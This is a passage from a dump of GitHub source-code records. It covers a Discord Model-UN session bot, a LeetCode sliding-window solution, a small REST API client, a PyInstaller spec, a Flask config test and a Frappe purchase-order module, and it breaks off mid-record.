asyncio\r\nfrom discord import FFmpegPCMAudio\r\nfrom collections import defaultdict\r\nfrom discord.ext import commands, tasks\r\nfrom discord.utils import get\r\nfrom youtube_dl import YoutubeDL\r\nclass Chair(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.session={}\r\n self.delegate=self.bot.get_cog('Delegate')\r\n self.general_speakers={}\r\n self.player={}\r\n self.register = defaultdict(dict)\r\n \r\n @commands.has_role('Chair')\r\n @commands.command(brief='Starts a session.', description='Enables all commands for a session and invites bot to voice channel.')\r\n async def startSession(self, ctx):\r\n self.session[ctx.guild.id]=True\r\n if self.delegate is not None:\r\n self.delegate.session[ctx.guild.id]=True\r\n self.delegate.general_speakers[ctx.guild.id]=[]\r\n else:\r\n t=[]\r\n self.general_speakers[ctx.guild.id]=t\r\n self.register[ctx.guild.id]={}\r\n connected = ctx.author.voice\r\n if connected:\r\n voice_client = get(ctx.bot.voice_clients, guild=ctx.guild)\r\n if voice_client and voice_client.is_connected():\r\n embedVar = discord.Embed(title=\"Error\", description=\"Bot is already in VC. 
Please disconnect bot from VC and try again.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar)\r\n \r\n else:\r\n await connected.channel.connect() \r\n await ctx.channel.send(\"Session has started!\")\r\n else:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Please join a voice channel.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.send(embed=embedVar)\r\n @startSession.error\r\n async def startSession_error(c,ctx, error):\r\n if isinstance(error, commands.MissingRole):\r\n embedVar = discord.Embed(title=\"Error\", description=\"The 'Chair' role is required to run this command.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.send(embed=embedVar)\r\n @commands.has_role('Chair')\r\n @commands.command(brief='Ends the current Session.', description='Disables session commands and disconnects bot from voice channel.\\n Clears GS list.')\r\n async def endSession(self, ctx):\r\n self.session[ctx.guild.id]=False\r\n if self.delegate is not None:\r\n self.delegate.session[ctx.guild.id]=False\r\n self.delegate.general_speakers[ctx.guild.id]=[]\r\n \r\n connected = ctx.author.voice\r\n if connected:\r\n server=ctx.message.guild.voice_client\r\n await server.disconnect()\r\n await ctx.channel.send(\"Session has ended!\")\r\n \r\n @commands.has_role('Chair') \r\n @commands.command(brief='View the general speakers list.', description='Prints out the current general speakers list.')\r\n async def GS(self, ctx):\r\n if self.session[ctx.guild.id]==True:\r\n embedVar = discord.Embed(title=\"General Speakers List\", description=\"General Speakers.\", color=discord.Color.from_rgb(78,134,219))\r\n t=''\r\n if self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]==[]:\r\n embedVar = discord.Embed(title=\"General Speakers List\", description=\"This list is empty.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar)\r\n else:\r\n for country in self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]:\r\n t=t+country+'\\n'\r\n embedVar.add_field(name=\"Countries:\", value=t, inline=False)\r\n \r\n await ctx.channel.send(embed=embedVar)\r\n \r\n @commands.has_role('Chair') \r\n @commands.command(brief='Removes first delegate from general speakers list.', description='Remove first delegate from general speakers list.\\n Used just after a speaker has finished.')\r\n async def popGS(self, ctx):\r\n if self.session[ctx.guild.id]==True:\r\n if self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]==[]:\r\n embedVar = discord.Embed(title=\"Error\", description=\"List is empty.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar) \r\n else:\r\n t=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id][0]\r\n self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id][1:]\r\n self.general_speakers[ctx.guild.id]=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]\r\n \r\n await ctx.channel.send(str(t)+' was removed from the GS list.')\r\n \r\n\r\n\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Yields the floor to a delegate.', description='Needs [delegate name] [time in seconds] and starts a timer.')\r\n async def speak(self,ctx, *,args):\r\n \r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n u=str(args[0])\r\n try:\r\n t=int(args[1])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", 
color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n except IndexError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Not enough arguments. Please provide Delegate and Time.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(u+\" has the floor!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=(t-10))\r\n await ctx.send(\"Cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(\"10 seconds left, \"+u)\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=(10))\r\n await ctx.send(\"Cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(\"Time is up, \"+u+'!')\r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Proposes a caucus.', description='requires [type].\\n If type is mod, structure is !propose mod [total time in min] [speakers time in sec] [country proposed] [topic].\\n If other type, requires [type] [total time in min] [country proposed].')\r\n async def propose(self, ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n type=args[0]\r\n if type=='mod':\r\n try:\r\n total=int(args[1])\r\n speaking=int(args[2])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n country=args[3]\r\n topic=' '.join(word for word in args[4:])\r\n embedVar = discord.Embed(title=\"Proposal\", description=\"A motion has been proposed.\", color=discord.Color.from_rgb(78,134,219))\r\n \r\n embedVar.add_field(name=\"Proposed Caucus:\", value=type, inline=False)\r\n embedVar.add_field(name=\"Topic:\", value=topic, inline=False)\r\n embedVar.add_field(name=\"Country:\", value=country, inline=False)\r\n embedVar.add_field(name=\"Speaking Time (seconds):\", value=int(speaking), inline=False)\r\n embedVar.add_field(name=\"Total Time (minutes):\", value=int(total), inline=False)\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n else:\r\n try:\r\n total=int(args[1])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n country=args[2]\r\n embedVar = discord.Embed(title=\"Proposal\", description=\"A motion has been proposed.\", color=discord.Color.from_rgb(78,134,219))\r\n embedVar.add_field(name=\"Proposed Caucus:\", value=type, inline=False)\r\n embedVar.add_field(name=\"Country:\", value=country, inline=False)\r\n embedVar.add_field(name=\"Total Time (minutes):\", value=int(total), inline=False)\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Starts a moderated caucus.', description='Requires !mod [total time in min].\\n Starts a timer.')\r\n async def mod(self,ctx, *,args):\r\n url='https://www.youtube.com/watch?v=SK3g6f5jsRA'\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n try:\r\n t=int(args[0])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", 
description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(\"The Mod has started!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=t*60)\r\n await ctx.send(\"mod cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(f\"Mod is over!\")\r\n \r\n voice_client=ctx.guild.voice_client\r\n YDL_OPTIONS = {\r\n 'format': 'bestaudio',\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec': 'mp3',\r\n 'preferredquality': '192',\r\n }],\r\n 'outtmpl': 'song.%(ext)s',\r\n }\r\n with YoutubeDL(YDL_OPTIONS) as ydl:\r\n ydl.download([url])\r\n voice_client.play(FFmpegPCMAudio(\"song.mp3\"))\r\n voice_client.is_playing()\r\n \r\n \r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Starts a unmoderated caucus.', description='Requires !unmod [total time in min].\\n Starts a timer.')\r\n async def unmod(self,ctx, *,args):\r\n url='https://www.youtube.com/watch?v=SK3g6f5jsRA'\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n try:\r\n t=int(args[0])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(\"The UnMod has started!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=t*60)\r\n await ctx.send(\"Unmod cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(f\"UnMod is over!\")\r\n voice_client=ctx.guild.voice_client\r\n YDL_OPTIONS = {\r\n 'format': 'bestaudio',\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec': 'mp3',\r\n 'preferredquality': '192',\r\n }],\r\n 'outtmpl': 'song.%(ext)s',\r\n }\r\n with YoutubeDL(YDL_OPTIONS) as ydl:\r\n ydl.download([url])\r\n voice_client.play(FFmpegPCMAudio(\"song.mp3\"))\r\n voice_client.is_playing()\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Register a delegate.', description='Requires !register [delegate name] [status].\\n Status can be present (p),present and voting(pv) or absent (a)')\r\n async def register(self,ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n member=args[0].lower()\r\n status= args[1]\r\n dic=self.register[ctx.guild.id]\r\n dic[member]=status\r\n if status=='p':\r\n await ctx.send(member.title()+\" is present!\")\r\n if status=='pv':\r\n await ctx.send(member.title()+\" is present and voting!\")\r\n if status=='a':\r\n await ctx.send(member.title()+\" is absent!\")\r\n elif status not in ['p','pv','a']:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Not a valid registration status. 
Use p, pv or a.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='View the register.', description='Displays all registered delegations and their statuses.')\r\n async def viewRegister(self,ctx):\r\n if self.session[ctx.guild.id]==True:\r\n dic=self.register[ctx.guild.id]\r\n embedVar = discord.Embed(title=\"Register\", description=\"All registered delegates.\", color=discord.Color.from_rgb(78,134,219))\r\n for k,v in dic.items():\r\n t=''\r\n if v=='p':\r\n t='Present'\r\n if v=='pv':\r\n t='Present and Voting'\r\n if v=='a':\r\n t='Absent'\r\n embedVar.add_field(name=k, value=t, inline=False)\r\n\r\n await ctx.channel.send(embed=embedVar)\r\n \r\n \r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Start a vote.', description='Starts a non-caucus vote. Useful for final vote or amendments.\\n Requires !voting [topic]')\r\n async def voting(self, ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n topic=' '.join(word for word in args)\r\n embedVar = discord.Embed(title=\"Voting\", description=\"A vote is in progress.\", color=discord.Color.from_rgb(78,134,219))\r\n embedVar.add_field(name=\"Topic:\", value=topic, inline=False)\r\n\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n \r\n\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Give Chair role.', description='Gives chair role to another member.\\n Requires !chair [@member]')\r\n async def chair(self, ctx,user: discord.Member):\r\n \r\n member = user\r\n role = get(ctx.message.guild.roles, name=\"Chair\")\r\n await member.add_roles(role)\r\n embedVar = discord.Embed(title=\"Chair Role\", description=\"Role was given to \"+str(member), color=discord.Color.from_rgb(78,134,219))\r\n \r\n\r\n m= await ctx.channel.send(embed=embedVar)\r\n \r\n \r\n \r\n\r\n \r\n \r\ndef setup(bot):\r\n bot.add_cog(Chair(bot))\r\n","repo_name":"aditepic10/MUNchkinDiscordBot","sub_path":"cogs/Chair.py","file_name":"Chair.py","file_ext":"py","file_size_in_byte":16476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"18206609032","text":"class Solution:\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n ans = 0\n zeros = 0\n\n l = 0\n for r, num in enumerate(nums):\n if num == 0:\n zeros += 1\n while zeros == 2:\n if nums[l] == 0:\n zeros -= 1\n l += 1\n ans = max(ans, r - l + 1)\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0487. 
Max Consecutive Ones II/0487.py","file_name":"0487.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"37312293595","text":"import requests\n\nTOKEN = None\n\n\ndef api_init(token):\n global TOKEN\n TOKEN = token\n\n\ndef api_url(path):\n return f'https://sisu.unit4.io/api{path}'\n\n\ndef request_headers(custom_headers):\n return {\n **custom_headers,\n 'Authorization': 'Bearer %s' % TOKEN,\n }\n\n\n# def request_post(url, data):\n# body = json.dumps(data).encode('utf-8')\n# headers = request_headers({\n# 'Content-Type': 'application/json',\n# })\n# req = urllib2.Request(url, headers=headers, data=body)\n# return request_send(req)\n\n\ndef request_put(url, data):\n print(f'> Req {url}')\n headers = request_headers({\n 'Content-Type': 'application/json',\n })\n\n try:\n res = requests.put(url, json=data, headers=headers)\n print(res.status_code)\n\n return res.json()\n except Exception as e:\n print(e)\n\n return None\n\n\n# def request_get(url):\n# headers = request_headers({})\n# req = urllib2.Request(url, headers=headers)\n# return request_send(req)\n\n\ndef api_set_project_file_tests(project_id, file_id, tests):\n url = api_url(f'/projects/{project_id}/file/{file_id}/tests')\n return request_put(url, tests)\n\n\ndef api_project_update_file(project_id, filename, log_list):\n log = '\\n'.join(log_list)\n data = {\n 'filename': filename,\n 'log': log,\n 'lastScanTs': 1,\n 'previewImageUrl': '',\n }\n\n res = request_put(api_url('/projects/%s/file' % project_id), data)\n\n print(filename)\n print(res)\n print(log)\n\n\ndef api_get_file_metadata(file_id):\n url = api_url(f'/data/files/{file_id}/metadata?token={TOKEN}')\n\n try:\n res = requests.get(url)\n if res.status_code == 404:\n return None\n\n return res.json()\n except Exception as e:\n print(e)\n return None\n\n\ndef api_get_file_content(file_id):\n url = api_url(f'/data/files/{file_id}/content?token={TOKEN}')\n\n try:\n res = requests.get(url)\n if res.status_code == 404:\n return None\n\n return res.content\n except Exception as e:\n print(e)\n return None\n","repo_name":"tmshv/sisu","sub_path":"sisu-worker/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42915421115","text":"import math\nangulo=int(input('angulo: '))\nv=int(input('velocidade: '))\nd=(v**2)*math.sin(math.radians(2*angulo))/9.8\nif 98<=d<100 or 100<d<=102:\n\tprint('Muito perto')\nelif d==100:\n\tprint('Acertou!')\nelse:\n\tprint('Muito longe')\n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_324/ch30_2019_04_01_13_01_41_695242.py","file_name":"ch30_2019_04_01_13_01_41_695242.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3754524852","text":"from collections import Counter\nimport math \ndef solution(weights):\n answer = 0\n seesaws = [2, 3/2, 4/3]\n \n # 배수 몸무게 세기\n for weight in weights:\n for seesaw in seesaws:\n if (weight*seesaw in weights):\n answer+=1\n \n # 같은 몸무게 세기\n same = dict(Counter(weights))\n for s in same:\n if same[s]>1:\n answer += math.comb(same[s], 2)\n \n return 
answer","repo_name":"KB-team3/AlgoGGang","sub_path":"길민지/Week_16/P152996_시소짝꿍.py","file_name":"P152996_시소짝꿍.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"69840086134","text":"from functools import partial\r\n\r\ndef MakeFunc(func, callback):\r\n def Run(func, callback):\r\n callback(func())\r\n return partial(Run, func, callback)\r\n\r\nasync def AsyncRunAll(loop, funcs):\r\n futures = []\r\n for fn in funcs:\r\n futures.append(loop.run_in_executor(None, fn)) \r\n for f in futures:\r\n await f\r\n return","repo_name":"dk1027/PythonQuestradeBalanceChecker","sub_path":"FuncUtils.py","file_name":"FuncUtils.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17614394691","text":"import textwrap\nfrom bitstring import BitArray\n\nNUM_OF_LEDS = 8\nFRAMES_PER_SECOND = 5\nLEN_OF_MSG_LENGTH = 6\n\nRARE_ASCII = \"00011110\"\nNEW_RARE = \"00011111\"\n\ndef _get_start_protocol(content, num_of_leds):\n start_segments = ['1' * num_of_leds]\n length = [str(format(len(content), \"08b\"))]\n return start_segments + length\n\n\ndef _identify_start(byte_stream, num_of_leds):\n for i, byte in enumerate(byte_stream):\n if byte == \"1\" * num_of_leds:\n break\n return byte_stream[i + 1:]\n\n\ndef _split_bytes(bytes_to_split, segment_length):\n return textwrap.wrap(bytes_to_split, segment_length)\n\n\ndef _read_file(file_path):\n stream = b''\n with open(file_path, 'rb') as binary_file:\n for line in binary_file.readlines():\n stream += line\n return BitArray(stream).bin\n\n\ndef _get_msg_length(byte_stream):\n raw_length = byte_stream[0]\n length = int(raw_length, 2)\n msg = byte_stream[0:length]\n return length, msg\n\n\ndef bmp_to_raw(file_path, num_of_leds):\n with open(file_path, \"rb\") as file:\n stream = file.read()\n content = textwrap.wrap(BitArray(stream).bin, num_of_leds)\n without_thrity = change_to_thirty(content)\n finished_data = replace_repeats(without_thrity)\n start = _get_start_protocol(finished_data, num_of_leds)\n return finished_data + content\n\n\ndef raw_to_bmp(byte_stream):\n hexed_data = [bytes([byte]) for byte in byte_stream]\n with open(\"leaked_img.bmp\", 'wb') as file:\n for h in hexed_data:\n file.write(h)\n\n\ndef change_to_thirty(stream):\n new_stream = []\n for byte in stream:\n if byte == RARE_ASCII:\n new_stream.append(NEW_RARE)\n else:\n new_stream.append(byte)\n return new_stream\n\n\ndef replace_repeats(stream):\n new_stream = []\n new_stream.append(stream[0])\n for i in range(1, len(stream)):\n if stream[i] == new_stream[i - 1]:\n new_stream.append(RARE_ASCII)\n else:\n new_stream.append(stream[i])\n return new_stream\n\n\ndef data_to_raw(file_path, num_of_leds):\n content = _split_bytes(_read_file(file_path), NUM_OF_LEDS)\n without_thrity = change_to_thirty(content)\n finished_data = replace_repeats(without_thrity)\n start = _get_start_protocol(finished_data, num_of_leds)\n return start + finished_data\n\n\ndef raw_to_data(byte_stream):\n decoded_msg = [chr(byte) for byte in byte_stream]\n return \"\".join(decoded_msg)\n\n\na = bmp_to_raw(r\"C:\\Users\\t8875881\\Desktop\\usb\\secret_img.bmp\", 8)","repo_name":"Savioor/sprint2","sub_path":"protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15705592383","text":"# Day 21 - 
Problem 24\r\n\r\n# Challenge\r\n# Write a Python class to convert a roman numeral to an integer.\r\n\r\n# Example\r\n\"\"\"\r\nSample input\r\n'MMMCMLXXXVI'\r\n'MMMM'\r\n'C'\r\n\r\nSample output\r\n3986\r\n4000\r\n100\r\n\"\"\"\r\n\r\n\r\nclass Conversion:\r\n \"\"\"\r\n Class to handle the conversion of numbers across different numeral system.\r\n \"\"\"\r\n def convert_roman_to_int(self, input):\r\n roman_values = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\r\n result = 0\r\n for i in range(len(input)):\r\n if (i > 0) and (roman_values[input[i]] > roman_values[input[i - 1]]):\r\n result += roman_values[input[i]] - 2 * roman_values[input[i - 1]]\r\n else:\r\n result += roman_values[input[i]]\r\n return result\r\n\r\n\r\nconversion = Conversion()\r\nprint(conversion.convert_roman_to_int('MMMCMLXXXVI'))\r\nprint(conversion.convert_roman_to_int('MMMM'))\r\nprint(conversion.convert_roman_to_int('C'))\r\n","repo_name":"jeffreytjs/100DayOfCode","sub_path":"class/convert_to_int.py","file_name":"convert_to_int.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20451876714","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\na = Analysis(['src\\\\git-watch.py'],\n pathex=['C:\\\\Users\\\\jacob\\\\git\\\\git-watch'],\n binaries=[],\n datas=[],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\n\na.datas += [ ('src/assets/icon.ico', '.\\\\src\\\\assets\\\\icon.ico', 'DATA') ]\n\npyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)\n\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='git-watch',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=False)\n\nimport shutil\nshutil.copyfile('config.cfg', '{0}/config.cfg'.format(DISTPATH))\n\n","repo_name":"jbmadsen/git-watch","sub_path":"git-watch-build.spec","file_name":"git-watch-build.spec","file_ext":"spec","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7934410949","text":"import funcx_web_service\n\nTEST_CONFIG = \"\"\"\\\nFOO = \"bar\"\nSECRET_VALUE = \"blah\"\nBOOL_VALUE = False\nCONTAINER_SERVICE_ENABLED = False\n\"\"\"\n\n\ndef test_read_from_config(tmp_path, monkeypatch):\n conf_file = tmp_path / \"test.config\"\n conf_file.write_text(TEST_CONFIG)\n monkeypatch.setenv(\"APP_CONFIG_FILE\", str(conf_file))\n\n app = funcx_web_service.create_app()\n assert app.config[\"FOO\"] == \"bar\"\n assert app.config[\"SECRET_VALUE\"] == \"blah\"\n assert not app.config[\"BOOL_VALUE\"]\n\n monkeypatch.setenv(\"SECRET_VALUE\", \"shhh\")\n monkeypatch.setenv(\"BOOL_VALUE\", \"true\")\n app_from_env = funcx_web_service.create_app()\n assert app_from_env.config[\"SECRET_VALUE\"] == \"shhh\"\n assert app_from_env.config[\"BOOL_VALUE\"]\n","repo_name":"funcx-faas/funcx-web-service","sub_path":"tests/unit/test_app_init.py","file_name":"test_app_init.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"33174465830","text":"import frappe,json\nfrom frappe.model.document import Document\n#from frappe.custom.doctype.custom_field.custom_field import create_custom_fields\n\nclass 
DealFinalize(Document):\n\tdef before_save(self):\n\t\tif self.saved:\n\t\t\tinitial_item={}\n\t\t\ti_item=[]\n\t\t\tfor row in self.deal_initiate:\n\t\t\t\ti_item.append(row.item_code)\n\t\t\t\tinitial_item[row.item_code]=row.qty\n\t\t\tfinal_item={}\n\t\t\tf_item=[]\n\t\t\tfor row in self.items:\n\t\t\t\t#row.amount=(row.qty*row.rate)\n\t\t\t\t#row.rate=row.rate/self.conversion_rate\n\t\t\t\tf_item.append(row.item_code)\n\t\t\t\tif row.item_code not in final_item:\n\t\t\t\t\t#frappe.throw(\"Item missing in table Deal Finalize \" f'{row.item_code}')\n\t\t\t\t\tfinal_item[row.item_code]=[float(row.qty)]\n\t\t\t\telse:\n\t\t\t\t\tfinal_item[row.item_code].append(float(row.qty))\n\t\t\tif not f_item:\n\t\t\t\tfrappe.throw(\"Deal Finalize Table is Empty\")\n\t\t\tr_m_item=\"\"\n\t\t\tfor row in initial_item:\n\t\t\t\tif row not in final_item:\n\t\t\t\t\tr_item=float(initial_item[row])\n\t\t\t\t\tr_m_item+=(f'for item \"{row}\" : Remaining Quantity - {r_item}<br>')\n\t\t\t\t#if not row in final_item:\n\t\t\t\t#\tr_m_item+=(f'For Item \"{row}\" : Remaining Quantity - {initial_item[row]}<br> Needs to be Filled')\n\t\t\t\telif row in final_item and float(initial_item[row])!=float(sum(final_item[row])):\n\t\t\t\t\tfrappe.errprint(i_item)\n\t\t\t\t\tfrappe.errprint(f_item)\n\t\t\t\t\tr_item=float(initial_item[row])-float(sum(final_item[row]))\n\t\t\t\t\tr_m_item+=(f'for item \"{row}\" : Remaining Quantity - {r_item}<br>')\n\t\t\tif r_m_item:\n\t\t\t\tfrappe.throw(\"Total value is not matching,<br><br>\" f'{r_m_item}')\n\t\telse:\n\t\t\tself.saved=1\n\tdef before_submit(self):\n\t\tself.before_save()\n\n@frappe.whitelist()\ndef get_rate(item,dn):\n\trate=frappe.db.get_value(\"Deal Initiate Item\",{\"parent\":dn,\"item_code\":item},\"rate\")\n\t#frappe.errprint(rate)\n\treturn rate\n\n\n\n@frappe.whitelist()\ndef make_indent(val,supplier,date,currency,price_list,name):\n\tval=json.loads(val)\n#\tfrappe.errprint(val)\n\tif not val:\n\t\tfrappe.throw(\"No rows selected\")\n\tp_details={}\n\t#frappe.errprint(val)\n\t#for row in val:\n\t#\tif row[\"payment_terms\"] == \"LC @ Sight\":\n\t#\t\trow[\"payment_terms\"]=\"LC\"\n\t#frappe.errprint(val)\n\tfor row in val:\n\t\tif row[\"payment_terms\"] not in p_details:\n\t\t\tp_details[row['payment_terms']]=[row[\"buyer\"]]\n\t\telif row['buyer'] not in p_details[row['payment_terms']]:\n\t\t\tp_details[row['payment_terms']].append(row[\"buyer\"])\n\t\t\t#p_term=row['payment_terms']\n\t\t\t#frappe.throw(\"Buyer not matching for \"f'{p_term}')\n\t#frappe.errprint(p_details)\n\tr_m_buyer=\"\"\n\tfor row in p_details:\n\t\tif(len(set(p_details[row]))>1):\n\t\t\tr_m_buyer+=(f'{row}<br>')\n\tif r_m_buyer:\n\t\tfrappe.throw(\"Buyer's not matching for Payment Terms<br><br>\" f'{r_m_buyer}')\n\telse:\n\t\tfor a_row in p_details:\n\t\t\t#frappe.errprint(\"in\")\n\t\t\tdoc=frappe.new_doc(\"Purchase Order\")\n\t\t\tdoc.supplier=supplier\n\t\t\tdoc.schedule_date=date\n\t\t#\tfrappe.errprint(currency)\n\t\t#\tfrappe.errprint(price_list)\n\t\t\tdoc.currency=currency\n\t\t\tdoc.buying_price_list=price_list\n\t\t\tflag = 0\n\t\t\tCount = 0\n\t\t\tfor row in val:\n\t\t\t\tif row[\"payment_terms\"] == a_row and row['indent'] == 0:\n\t\t\t\t\tflag = 1\n\t\t\t\t\tCount+=1\n\t\t\t\t\tdf = frappe.get_doc(\"Deal Finalize\",name)\n\t\t\t\t\tdf.items[(row['idx']-1)].indent = 1\n\t\t\t\t\tdf.save()\n\t\t\t\t\tif not doc.company == 
row[\"buyer\"]:\n\t\t\t\t\t\tdoc.company=row['buyer']\n\t\t\t\t\t\tw=frappe.db.get_value(\"Warehouse\",{\"warehouse_name\":\"Stores\",\"company\":row['buyer']},\"name\")\n\t\t\t\t\t\tdoc.set_warehouse=w\n\t\t\t\t\tdoc.append(\"items\",{'item_code':row['item_code'],'item_name':row['item_name'],'uom':row['uom'],'description':row['description'],'rate':row['rate'],'amount':row['amount'],'qty':row['qty'],'stock_uom':row['stock_uom'],'payment_terms':row['payment_terms'],'palletized':row['palletized'],'port':row['port'],'country_of_origin':row['country_of_origin'],'incoterms':row['incoterms'],'buyer':row['buyer']})\n\t\t\tif flag:\n\t\t\t\tdoc.linked_deal_finalize=name\n\t\t\t\tdoc.save()\n\t\t\t\tflag = 0\n\t\tif Count:\n\t\t\tfrappe.msgprint(\"Indent Created\")\n\t\telse:\n\t\t\tfrappe.msgprint('Indent Already Created for the selected record')\n\n@frappe.whitelist()\ndef make_payment_terms(self,method):\n\tif (self.items[0].payment_terms == \"DA\"):\n\t\tdoc=frappe.new_doc(\"DA\")\n\t\tval=self.items\n\t\tdoc.supplier=self.supplier\n\t\tdoc.currency=self.currency\n\t\tdoc.price_list=self.buying_price_list\n\t\tdoc.schedule_date=self.schedule_date\n\t\tdoc.company=self.company\n\t\tdoc.transaction_date=self.transaction_date\n\t\tfor row in val:\n\t\t\tdoc.append(\"items\",{'item_code':row.item_code,'item_name':row.item_name,'uom':row.uom,'description':row.description,'rate':row.rate,'amount':row.amount,'qty':row.qty,'stock_uom':row.stock_uom,'payment_terms':row.payment_terms})\n\t\tdoc.linked_indent=self.name\n\t\tdoc.total_quantity=self.total_qty\n\t\tdoc.total_in_words=self.in_words\n\t\tdoc.total_amount=self.total\n\t\tdoc.save()\n\t\tlink=\"/app/da/\"+doc.name\n\t\tfrappe.msgprint(\"DA Created <a 